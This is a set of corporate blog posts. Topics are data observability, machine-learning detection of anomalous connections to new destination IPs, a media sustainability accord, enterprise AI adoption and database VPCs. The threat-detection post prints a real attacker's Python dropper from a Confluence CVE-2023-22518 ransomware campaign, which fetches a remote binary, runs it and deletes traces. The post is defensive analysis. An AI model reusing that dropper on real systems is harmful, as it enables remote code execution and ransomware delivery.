
The Power of Data Observability: Your Edge in a Fast-Changing World

by: Andy d'Andilly

In 2012, IBM estimated that 90% of the world’s data had been created in the previous two years. Since then, data has become the fastest growing and most important asset for any organization. Every day, businesses are inundated with more data, higher consumer expectations, and the increasing pressure to make decisions at speed.

Welcome to the era of data observability

For organizations to stand out and truly deliver value, they must see and understand what’s happening across their data landscape, not just guess and hope for the best. That’s where data observability steps up and enables you to drive business change and innovation.

What is data observability?

Data observability isn't just a buzzword; it's a vital set of tools and practices that empower organizations to proactively monitor the health and flow of their data throughout the entire journey from ingestion to consumption. Instead of simply reacting to data issues after they arise, observability enables you to spot potential obstacles before they cause problems.

Seeing your data clearly can transform your business

Platforms like Akamai’s TrafficPeak offer real-time, granular visibility into traffic patterns, data streams, and performance metrics, essentially shining a spotlight into every corner of your data pipelines. 

This deep insight helps you quickly identify bottlenecks, spot anomalies, and find inconsistencies long before they escalate into business-critical issues. Ultimately, data observability doesn't just protect your data quality; it fosters trust and confidence, unleashing the true power of data-driven decision-making.

The need for speed and smarts

The modern world runs on speed. Consumers expect instant gratification and personalized experiences 24/7. To meet these demands, business teams need real-time insights that allow them to pivot, adapt, and innovate without delay. 

During peak periods, every second counts — and any downtime represents a lost opportunity that can’t be recovered. This fundamental shift means data is no longer secondary; it’s the primary engine that’s powering every competitive advantage.

But a growing volume of data also brings a critical question: How can you truly trust what you're seeing? The smart answer is data observability.

When combined with powerful platforms like TrafficPeak, it delivers the confidence necessary to ensure your data is accurate, your insights are reliable, and your business is poised to operate at the velocity your customers expect.

How data observability gives you the edge

Adopting data observability isn't just a smart move; it's essential for any modern business. It begins with robust data quality assurance, which ensures that you're never flying blind: You can spot errors, duplicates, and outdated information before any of it leads you astray, fostering trustworthy data for consistently better decisions.

Enable faster problem-solving

When issues inevitably arise, data observability enables faster problem-solving by empowering your teams to quickly see and respond. Tools like TrafficPeak quickly pinpoint the root cause, minimize downtime, and keep your business running smoothly.

Facilitate proactive data management

Furthermore, data observability facilitates proactive data management, letting you anticipate changes, optimize performance, and scale confidently as your business grows. TrafficPeak's insights enable seamless resource allocation.

Deliver more value to consumers

Ultimately, by ensuring data you can truly trust, you're empowered to deliver more value to consumers by innovating to provide faster, better, and more personalized experiences that foster lasting customer loyalty.

The observable future: See clearly, lead boldly

Success in today’s business world demands more than just keeping up — it requires setting the pace. With robust data observability, powered by technologies like TrafficPeak, your organization gains the agility to react faster, seize new opportunities, and consistently deliver greater value to customers.  

Data-driven capabilities have evolved, and observability is the force behind this evolution. It transforms your data into a transparent and trustworthy asset and builds an organization that’s ready for any challenge. 

In the rush to meet escalating consumer expectations and outperform competitors, data observability isn't optional; it's absolutely essential.  

Observability bridges the critical gap between aspirational decisions and the confident, data-backed choices you can make today. With powerful solutions like TrafficPeak, you gain the clarity to see clearly, lead boldly, and let your data confidently guide your way forward.

Ready to lead with confidence?

Don’t just keep pace — set it. Embrace the power of data observability with Akamai’s TrafficPeak and turn your data into a strategic advantage. Gain the clarity to act faster, the agility to adapt smarter, and the confidence to lead boldly in a data-driven world.

Start your journey toward real-time, reliable insights today.


How to Secure Enterprise Networks by Identifying Malicious IP Addresses

by: Ido Sakazi & Yonatan Gilvarg

Introduction

Securing enterprise network traffic is crucial in the fight against threat actors who are trying to harm organizations and cause irreparable damage. The identification of new and potentially malicious destination IPs plays a key role in this defense — you can’t protect what you don’t know needs to be protected.

The ability to detect anomalous connections to these previously unseen destination IPs is a powerful tool, providing administrators with insights and warnings about potential threats.

Our focus on previously unseen destination IPs stems from the recognition that threat actors frequently exploit these new IP addresses to bypass traditional security measures, making it essential to prioritize detection efforts accordingly.

In this blog post, we present a machine learning method that detects anomalous connections to new destination IPs accessed from an organization’s network nodes. We built the method on the connections’ metadata. Our approach employs the Word2Vec algorithm to represent features associated with destination IPs, followed by an autoencoder as a final step.

We used this method in a real-world campaign and it led to a successful detection. Suspicious IP addresses are potentially involved in malicious activities — such as command and control (C2) servers, botnets, and phishing domains — so quick detection can be the difference between an alert and an incident.

Identifying a suspicious new destination IP is challenging

We encountered several challenges in our effort to detect and mitigate threats posed by new unseen destination IPs. Because these IPs lack prior reputation or historical data, traditional detection methods are ineffective. Their novelty makes it challenging to distinguish benign first-time communications from malicious ones, as they can resemble everyday traffic patterns.

We found that analyzing the sequence of the source process, destination port, autonomous system number (ASN), and geolocation linked to the destination IP was successful in addressing these challenges. By doing so, we gained more profound insights into the context of network traffic. This approach enabled us to significantly improve our ability to identify and flag suspicious new destination IPs.

Anomaly detection

Our methodology uses machine learning techniques that fit the unique challenges of anomaly detection in network traffic. We gather diverse metadata associated with network traffic data that contains crucial information about source processes, destination ports, ASNs, geolocations, and more. Thorough analysis requires diverse data, and producing useful output requires categorizing that data first.

We categorize and group the source process and destination port based on their respective roles for easier analysis. For example, we consolidated different Structured Query Language (SQL) servers’ standard ports (such as MSSQL 1433 and MySQL 3306) into a single category: SQL server.
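The port consolidation described above can be sketched as a simple lookup table. This is an illustrative sketch only; the category names and port groupings here are hypothetical, not the exact production mapping:

```python
# Hypothetical port-to-category map, illustrating the consolidation idea
PORT_CATEGORIES = {
    1433: "sql_server",    # MSSQL
    3306: "sql_server",    # MySQL
    80: "web",
    443: "web",
    8080: "web",
    22: "remote_admin",    # SSH
    3389: "remote_admin",  # RDP
    53: "dns",
}

def categorize_port(port: int) -> str:
    # Ports outside the known map fall into a catch-all bucket
    return PORT_CATEGORIES.get(port, "other")

print(categorize_port(1433), categorize_port(3306))  # both map to "sql_server"
```

Collapsing many raw port numbers into a handful of role-based categories keeps the downstream vocabulary small, which helps the embedding step generalize.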

Using machine learning for anomaly detection

We apply the Word2Vec algorithm to capture the semantic similarities between different IPs based on the context of network analysis. Word2Vec, which was originally developed for natural language processing, learns vector representations by analyzing the context in which elements appear.

In our approach, we model sequences of network metadata as input to the algorithm, allowing it to learn meaningful embeddings that reflect behavioral relationships across the network. This enables more effective anomaly detection and pattern recognition.
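As a hedged sketch of that modeling step, each connection’s metadata can be serialized into one short token sequence (a “sentence”) before training; the field names and sample values below are invented for illustration:

```python
def connection_sentence(conn: dict) -> list:
    # One "sentence" per connection: context tokens followed by the destination IP,
    # so the embedding learns which contexts an IP tends to appear in
    return [
        f"proc:{conn['process']}",
        f"port:{conn['port_category']}",
        f"asn:{conn['asn']}",
        f"geo:{conn['geo']}",
        f"ip:{conn['dst_ip']}",
    ]

connections = [
    {"process": "chrome.exe", "port_category": "web", "asn": 15169, "geo": "US", "dst_ip": "203.0.113.10"},
    {"process": "python3", "port_category": "other", "asn": 64500, "geo": "DE", "dst_ip": "198.51.100.7"},
]
sentences = [connection_sentence(c) for c in connections]
# sentences can then be passed to a Word2Vec implementation (e.g., gensim)
# to learn one embedding vector per token
```

Because tokens that co-occur in a sentence are pushed toward nearby vectors, destination IPs end up embedded close to the processes, ports, ASNs, and geolocations they are usually seen with.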

By representing IPs as high-dimensional vectors, we enable the algorithm to identify patterns of IPs that frequently appear together in network traffic. IPs that are clustered closely in vector space have strong contextual relationships, while outliers or anomalies are positioned farther away. This approach offers valuable insights into the structure and dynamics of the network traffic.

In the final stage of our methodology, we use an autoencoder — a type of artificial neural network designed for unsupervised learning that aims to compress and reconstruct input data efficiently. The autoencoder allows us to detect anomalies in network traffic without relying on labeled training data. This enables our algorithm to adapt to evolving threat scenarios and detect novel attack patterns effectively.

The embedding features are fed into the autoencoder, enabling it to learn and reconstruct normal network traffic patterns (Figure 1). Connections with high reconstruction errors are flagged as potential malicious activity.
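To make the reconstruction-error idea concrete, here is a minimal synthetic sketch that substitutes a linear autoencoder (principal components via SVD) for the neural autoencoder described above; the data and dimensions are invented for illustration:

```python
import numpy as np

rng = np.random.default_rng(0)
# 200 synthetic "normal" connection embeddings that lie near an 8-dimensional
# subspace of a 16-dimensional space, plus one outlier that breaks the pattern
normal = rng.normal(size=(200, 8)) @ rng.normal(size=(8, 16)) + 0.1 * rng.normal(size=(200, 16))
outlier = 6.0 * rng.normal(size=(1, 16))
X = np.vstack([normal, outlier])

# "Train" on normal traffic: keep the top 8 principal directions
mu = normal.mean(axis=0)
_, _, Vt = np.linalg.svd(normal - mu, full_matrices=False)
W = Vt[:8]                                # encoder weights (decoder is the transpose)

recon = (X - mu) @ W.T @ W + mu           # encode, then decode
errors = ((X - recon) ** 2).mean(axis=1)  # per-connection reconstruction error

# Flag connections whose error is far above typical normal traffic
threshold = 5 * np.median(errors[:200])
flagged = np.where(errors > threshold)[0]  # the outlier at index 200 stands out
```

A neural autoencoder generalizes the same recipe to nonlinear structure, but the flagging logic is identical: low error means the connection matches learned normal behavior, and high error marks it for review.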

Fig. 1: Example of an autoencoder model and outputs

Anomaly validation

A core tenet of this methodology is continuous review and learning. By applying our algorithm, we can review all new destination IPs and check each connection to them daily to identify anomalies and, thus, potentially malicious behavior.

Figure 2 is a real example of a daily output for a customer. There were 462 new destination IPs in that single day. 

Fig. 2: Visualization of new IPs in a customer’s network in a single day
  • The horizontal red line represents the threshold for flagging a connection as anomalous. Any connection that results in a reconstruction error above this line would be considered suspicious.

  • The blue dots signify those IPs that our system determined to be benign, as they displayed low reconstruction errors and matched the expected pattern of network behavior. 

  • The orange dot represents a single IP that our analysis flagged as anomalous due to its high reconstruction error. 

The anomaly was subsequently investigated and confirmed to be a component of a campaign attack, underscoring the robustness and critical importance of our detection mechanisms. The next section includes the details of the attack.

How our algorithm successfully detected an attack in a customer environment

New methodology is great in theory, but it must be practical to be truly valuable. We chose to run our algorithm against a previously detected attack, which was part of a known Confluence campaign exploiting the CVE-2023-22518 vulnerability. This attack led to remote code execution and the deployment of ransomware.

In this case, the initial exploitation allowed attackers unauthorized access to the server. They established a connection to a command and control (C2) server via Python and downloaded a malicious file named qnetd (Figure 3).

python3 -c '
import os, sys, time
import platform as p
if sys.version_info.major == 3:
    import urllib.request as u
else:
    import urllib2 as u
h = "/tmp/lru"
d = "./qnetd"
ml = {"3x": ["i386", "i686"], "6x": ["x86_64", "amd64"], "3a": ["arm"], "6a": ["aarch64"]}
try:
    m = p.machine().lower()
    if os.popen("id -u").read().strip() == "0":
        try:
            os.chdir("/var")
        except:
            os.chdir("/tmp")
    else:
        os.chdir("/tmp")
    for l in open(h):
        for k, al in ml.items():
            for a in al:
                if a == m:
                    l = l + "." + k
        r = u.urlopen(l)
        with open(d, "wb") as f:
            f.write(r.read())
            f.flush()
        r.close()
        os.system("chmod +x " + d)
        os.system("chmod 755 " + d)
        os.system(d + " > /dev/null 2>&1 &")
        time.sleep(5)
        os.remove(d)
        os.remove(h)
except:
    if os.path.exists(h):
        os.remove(h)
    if os.path.exists(d):
        os.remove(d)
    pass
'
Fig. 3: Malicious Python command identified during the investigation

We observed two servers communicating with the malicious IP address, which was part of the widespread Atlassian Confluence CVE-2023-22518 campaign, from both the Python and qnetd processes. Our method detected these connections because their geolocation was anomalous (Figure 4).

Fig. 4: Discovery example

Enabling the proactive identification of suspicious network connections

Detecting anomalous network connections to new destination IPs is a critical aspect of enterprise cybersecurity. By leveraging Word2Vec and autoencoder techniques, our approach analyzes network traffic metadata such as source processes, destination ports, and geolocation to identify potential security threats that might bypass traditional detection methods.

In a real-world case study, our method successfully uncovered a sophisticated attack that was exploiting a Confluence vulnerability (CVE-2023-22518), which demonstrated the method’s effectiveness in detecting a malicious IP that was part of a ransomware deployment campaign.

The technique will enable organizations to proactively identify suspicious network connections by learning and flagging deviations from normal traffic patterns.

Find out more

To learn more about our managed threat hunting service, visit our Akamai Hunt web page.


Conversations and the Media Climate Accord at IBC2025

by: Mike Mattera

Our customers helped chart our journey

Since 2009, we’ve been on a journey at Akamai to not only advance our own sustainability goals but also to help bring our customers along with us. One of the best lessons I’ve learned in this work is the power of listening.

By asking for honest feedback from our customers, we’ve been able to build a sustainability program that doesn’t just showcase Akamai’s capabilities — it meets our customers where they are.

And here’s the reality: No two customer journeys are alike. Some companies come to us with well-established sustainability strategies and ambitious targets. Others are just starting to think about what sustainability might mean for them.

What we’ve discovered by listening is that, for many organizations, the very first challenge isn’t about data or reporting; it’s simply about setting goals to get started. Without that foundation, it’s hard to tap into the tools and insights that can accelerate real progress.

Enter the Media Climate Accord

This is why I see so much value in the Media Climate Accord (MCA). This new initiative officially launched at IBC2025 to unite the global media and entertainment technology sector around a shared commitment to climate action and net-zero emissions.

It gives the media industry a shared framework and a space for collaboration that makes it easier for companies, regardless of their starting point, to take that critical first step. By aligning on common principles and sharing what works, we can lower the barriers to action and help more organizations build momentum toward decarbonization.

Sustainability isn’t a solo effort

At Akamai, we take pride in being one of those collaborators. We provide the data, the technology, and the expertise to help customers not only set certain goals, but also achieve them with confidence. More important, we do it as part of a larger ecosystem because sustainability isn’t a solo effort. It takes collective action.

Enter the MCA. This initiative is about meeting companies where they are today and giving them the support, the partnerships, and the shared ambition they need to move further and faster.

Together, we have the opportunity to contribute to the effort of supercharging the media industry’s environmental journey and to prove that collaboration really is the fastest path to progress.

Meeting of the minds at IBC2025

As we started to explore this idea with our industry colleagues, we quickly realized that this challenge of setting meaningful sustainability goals is not unique to any one region, industry, or company size. It’s a global issue.

And Akamai is uniquely positioned to help address this issue, given our role at the intersection of technology, media, and customer engagement.

So, we decided to test some of these ideas at this year’s International Broadcasting Convention (IBC) in Amsterdam. In partnership with the Media Technology Sustainability Series (MTSS) and Greening of Streaming, we brought together leaders from across the media, broadcasting, and technology space.

Our goal wasn’t to create another catalog of high-level commitments. Instead, we wanted to talk in real terms about what it takes to set sustainability goals that actually drive change.

What we learned

The conversations we had at IBC2025 were both informative and energizing. We deliberately kept the session loosely structured so that these leaders could connect organically with industry experts and peers, unpack what “good” really looks like, and leave with tangible next steps.

Specifically, we focused on helping attendees:

  • Set bold, yet credible targets that stretch ambition but are achievable

  • Align those targets with business strategy so sustainability isn’t a side project but a driver of value

  • Activate teams and suppliers because goals only matter when they’re operationalized across the ecosystem

Since sustainability touches nearly every part of a business, we also wanted the event to be accessible to professionals who work outside of the sustainability area. That meant bringing in voices from engineering, operations, finance, marketing, and other parts of the business.

Having a mixed group of people in the room, sharing real stories and engaging in a live tabletop discussion, created a space for practical strategies that attendees could act on immediately.

This is exactly the kind of approach we see scaling within the MCA. By fostering collaboration across the media value chain, the MCA creates a framework where companies, whether they’re just starting or already leading, can learn from one another, align on what “good” looks like, and move the industry forward together.

Collective action can supercharge the journey

What excites me most is the potential for collective action.  The MCA embodies the spirit of shared ambition, practical collaboration, and accountability that can transform how the media sector contributes to global decarbonization.

Akamai has prided itself on our role to help make those first steps easier and more impactful for our customers. But the real power comes when the industry acts as one. That’s how we’ll help supercharge the journey, not just for individual companies, but for the entire media ecosystem.

#JoinUs

We came away from this innovative session with insights that will shape how we grow this into a more comprehensive, long-form event. But, more important, we see this as the beginning of an ongoing conversation, not a one-time exchange.

Establishing a direct feedback loop with our customers and peers ensures that what we build will continue to evolve, adapt, and stay relevant as the sustainability landscape shifts in real time.

The launch of the MCA reminds us that the challenges we face are bigger than any one company, and the solutions require collective action. By leaning into collaboration, sharing what works, and being honest about what doesn’t, we can accelerate progress far beyond what any of us could achieve alone.

My three cents

Don’t wait for the perfect plan or the ideal conditions. Let’s commit to bold goals, align them with our businesses, and take action now. Together, we can turn conversations into impact and prove that the media sector has the power to lead on climate action.

If you are a customer who has a question about setting meaningful sustainability goals, please feel free to reach out to us at sustainability@akamai.com.


The State of Enterprise AI: Why Edge Native Is the Fastest Path to ROI

by: Hana Jeddy

Akamai recently commissioned a study by Forrester, The State of Enterprise AI: Gaining Experience and Managing Risk, to better understand how companies are adopting artificial intelligence (AI) and what they are prioritizing.

We gained some useful insights from that research. For example, 76% of organizations are adopting AI solutions to improve customer experience (CX) and operational efficiency, and 71% view customer retention as another leading motivator. When asked how they measure AI success, respondents pointed to improved CX (75%) and increased revenue (74%), highlighting how tightly customer satisfaction is tied to growth.

But, arguably, the most important thing we learned is that companies are achieving success with AI through a phased adoption pattern.

Enterprise AI adoption is at an inflection point

Enterprise AI adoption has reached an inflection point as growth in scale, maturity, and technical ambition converge. Companies are beginning to plan their shift from early adoption to an organization-wide AI rollout, which requires scalable edge AI setups.

To prepare sufficiently for this shift, the companies at the forefront of AI adoption are doing two things: They are developing a foundation of low-risk, high-reward AI applications, and they are preparing for more complex AI use in the future by experimenting with the technology today. 

The next wave of AI applications will be more compute intensive and more globally distributed with fast data processing. Imagine real-time language translation at scale during live global events, customer service calls, or in a multiplayer gaming chat — all without downtime. Or think about AI-powered visual search and object recognition that would allow shoppers to snap a photo of a product to find similar items instantly while in a retail store. 

So, the question for technical leaders today is: How do you scale AI in a way that delivers real-time performance, adapts to unpredictable demand, and meets compliance requirements in every region?

Shift to edge native infrastructure to prepare for the future

Companies should consider moving over to an edge native execution model now so that they have the foundation to handle more complex edge AI use cases in the future. Even today, real-world use cases in customer-facing AI are demanding.

Applications such as chatbots, product recommendations, or voice-driven assistants are all latency bound. A few hundred milliseconds can be the difference between delight and frustration. These workloads are also bursty — they spike during flash sales, media events, or viral campaigns. And because they often involve sensitive customer data, they require strict control over where and how information moves.

Traditional cloud models struggle to keep pace with these hurdles. On the other hand, edge native architectures bring computation closer to the user. That means lower latency to protect customer satisfaction, regional deployment that aligns with global ambitions and regulatory rules, and the ability to scale in a way that can absorb sudden traffic peaks without runaway costs.

Shifting to edge native infrastructure for AI adoption can not only get companies through the rest of the early-adoption phase of the AI tech wave, but also prepare them for the future.

Use cases: From theory to practice with AI at the edge

Use case 1: Automated customer service resolution 

Consider automated customer service resolution, one of the top enterprise use cases identified in the Forrester study. Many organizations still rely on human agents to handle large volumes of routine requests, which creates bottlenecks. With an edge native approach, incoming questions can be sorted and triaged directly at the edge. The right requests flow to the right systems with security policies enforced before they ever touch back-end infrastructure.

Lightweight AI models running on Linode Kubernetes Engine (LKE) generate instant, streaming responses, often by pulling data from managed databases or cached content for speed and accuracy. The results are faster response times, lower escalation rates, and higher customer satisfaction. More than half of organizations are already implementing automated resolution, with nearly one-third ranking it as their most critical AI use case.

Use case 2: Personalized recommendations

A second example is personalized recommendations. Whether it’s a retailer suggesting the right product or a media platform curating content, personalization has to feel instantaneous. Edge native deployment allows user behavior data to be collected and processed locally, with built-in privacy protections. Nearby databases and caching can speed the lookup of past interactions while AI models run on LKE or virtual machines, depending on complexity.

The entire cycle (input, inference, and output) can happen in less than 200 milliseconds. This level of responsiveness is why more than half of enterprises already see personalization as a core AI capability, according to the Forrester survey.

The same model can power more complex future use cases, such as visual search (customers upload an image and get instant, AI-enhanced results) or voice-driven applications (low-latency streaming makes conversations feel natural). As organizations push into these new areas, the need for compute and storage closer to users becomes even more pronounced.

Reducing risk with the right stack

For AI to succeed at scale, engineers need a platform built for resilience, predictability, and security. This is Akamai’s vision: Build a stack that not only supports today’s workloads in core regions but also evolves to bring AI closer to users in the future.

Today, the App Platform helps teams simplify deployment by integrating open source projects into a production-ready environment, reducing the complexity of standing up applications. LKE makes it easy to rapidly deploy models with autoscaling, paired with a flat-rate pricing model that keeps costs predictable even during periods of bursty demand.

Managed databases deliver low-latency reads and built-in failover to safeguard customer-critical paths, while virtual machines provide the flexibility for long-running or specialized workloads, all supported by Zero Trust integration.

What ties these components together, now and in the future, is proximity and predictability. AI applications can already run with stable costs and reliable performance across Akamai’s global footprint, and the trajectory is moving toward extending these benefits even closer to customers as GPU and platform availability continue to expand.

Security and compliance by design

A major hurdle when it comes to scaling AI is convincing both companies and customers that they can trust the technology. According to the Forrester study, 63% of organizations cite security as a concern, 55% worry about compliance, and 45% fear damage to the brand’s reputation if things go wrong. These risks are real, but they can be mitigated with a security-first approach built directly into the edge.

Edge native models allow policies to be enforced before requests ever reach an AI system. Traffic can be isolated, rate limited, and filtered through firewalls and bot defenses. Zero Trust principles apply not only to users but also to workloads themselves.

Additionally, enterprises can adopt safe deployment practices such as canary rollouts, in which new features are tested on a small fraction of users, and red-team exercises to uncover weaknesses before they affect customers. For organizations that feel their current platforms leave gaps, prebuilt reference architectures and Golden Paths offer a way to build consistently and securely without starting from scratch.
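As one hedged illustration of the canary pattern (the function and salt below are invented for this sketch, not a specific product feature), deterministic hash-based bucketing keeps each user in the same cohort on every request:

```python
import hashlib

def in_canary(user_id: str, fraction: float, salt: str = "ai-feature-x") -> bool:
    # Map each user to a stable value in [0, 1) via a hash,
    # so the same user always lands in the same cohort
    digest = hashlib.sha256(f"{salt}:{user_id}".encode()).digest()
    bucket = int.from_bytes(digest[:8], "big") / 2**64
    return bucket < fraction

users = [f"user-{i}" for i in range(10_000)]
canary = [u for u in users if in_canary(u, 0.05)]
print(len(canary) / len(users))  # roughly 0.05
```

Changing the salt reshuffles the cohorts for the next experiment, while gradually raising the fraction promotes the feature from canary to full rollout without moving existing canary users out.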

With an edge native model, companies can safeguard both the brand and the customer experience while continuing to innovate.

The 3 phases of global AI adoption at the edge

One of the most important lessons from Forrester’s data on enterprise adoption patterns is that AI does not need to be rolled out everywhere at once. A phased approach allows organizations to balance ambition with risk management.

Phase 1

Companies leading the charge with AI typically start with a focused pilot like automated service resolution for a specific support queue. They define clear success metrics — such as response times, automation rates, and escalation thresholds — and establish guardrails to manage risk.

Phase 2

Once the pilot delivers results, the next phase is about scaling. This might mean extending personalization across multiple customer touchpoints, such as a website and a mobile app, and deploying the capability across several regions. This step reflects the near-term global ambitions that more than 70% of enterprises report.

Phase 3

Finally, in Phase 3, organizations broaden their use of AI into newer areas like visual search or procedural content creation. By this point, they’ve established strong standards for performance and safety, making it possible to innovate responsibly.

AI foundations on the edge

The data tells us that enterprises are going all in on AI. Adoption rates are high, companies are actively connecting AI applications to return on investment (ROI), and many have clear goals to take the technology global. Success will depend on execution.

Customer-facing AI applications are latency bound, full of spikes, and data sensitive. Edge native models provide a better path to delivering the infrastructure that enterprise AI requires.

For AI engineers, the challenge is to build smarter applications in a way that customers can trust and businesses can scale. At Akamai, we believe the edge is where enterprise AI ambitions meet reality. Our distributed platform is built to help organizations deploy AI globally without sacrificing security, performance, or compliance.

Learn more

For all the results, download the full Forrester report.


Isolate Your Database: VPC for Managed Databases Is Available Now

by: Prasoon Pushkar

Since we initially launched Akamai Managed Databases in 2024, some of our largest customers have used these managed databases to accelerate application development while reducing operational overhead. 

Now, our Managed Database offering is even better with virtual private cloud (VPC) capabilities — available in open beta today — that allow customers to place their database instances behind a private network for enhanced security and performance.

A VPC is an isolated network that enables cloud resources to communicate with one another privately and to selectively gate access to the public internet or other private networks. VPCs are critical for shielding database resources from unauthorized traffic and for minimizing the database's attack surface against potential security threats.

Why VPC is essential for databases

Modern enterprises face a critical challenge: Database workloads distributed across multiple managed instances need secure communication without public internet exposure. VPC addresses this challenge by creating a logically isolated network environment that makes security the foundation of your database architecture.

Key benefits of VPC for Managed Databases

  • Network isolation: Database resources operate within completely isolated network boundaries.

  • Private IP communication: All database traffic uses private addresses, eliminating external exposure.

  • Cost optimization: Enterprise customers that move large datasets can achieve significant savings by keeping traffic within the private network and reducing data transfer charges for communication between database instances. 

  • Better performance: Direct private network paths eliminate internet routing overhead.

Key points to consider while using VPC for Managed Databases

  • IPv4 support: Full IPv4 networking (IPv6 support coming soon)

  • Custom network configuration: Define IP ranges and subnets

  • Access control list: Granular firewall rules for database access

  • Multisubnet architecture: Separate network segments for different database tiers

Note: Cross-region VPC support is not currently available, and VPC for Managed Databases is currently available only in the new core compute regions.
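The multisubnet idea can be sketched with Python's standard ipaddress module; the address plan and tier names below are hypothetical illustrations of subnet planning, not an Akamai API:

```python
import ipaddress

# Hypothetical VPC address plan: carve one /24 per database tier out of a /22
vpc = ipaddress.ip_network("10.0.0.0/22")
tiers = ["primary", "replica", "analytics"]
subnets = dict(zip(tiers, vpc.subnets(new_prefix=24)))

for tier, net in subnets.items():
    print(tier, net)  # primary 10.0.0.0/24, replica 10.0.1.0/24, analytics 10.0.2.0/24
```

Separating tiers this way lets access control lists allow, for example, application subnets to reach the primary tier while keeping the analytics tier reachable only from internal tooling.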

Getting started

VPC integrates with the existing Akamai database services. Users can migrate existing databases into VPC environments or deploy new databases directly within private networks.

Database security now extends beyond access control to include network-level isolation. A VPC provides the secure foundation necessary to protect valuable data assets while enabling the agility that modern businesses demand.

Set up your own isolated virtual private cloud, and create new databases or bring in existing ones. (A database needs to be in the same region where the VPC is created.) Follow our step-by-step guide.
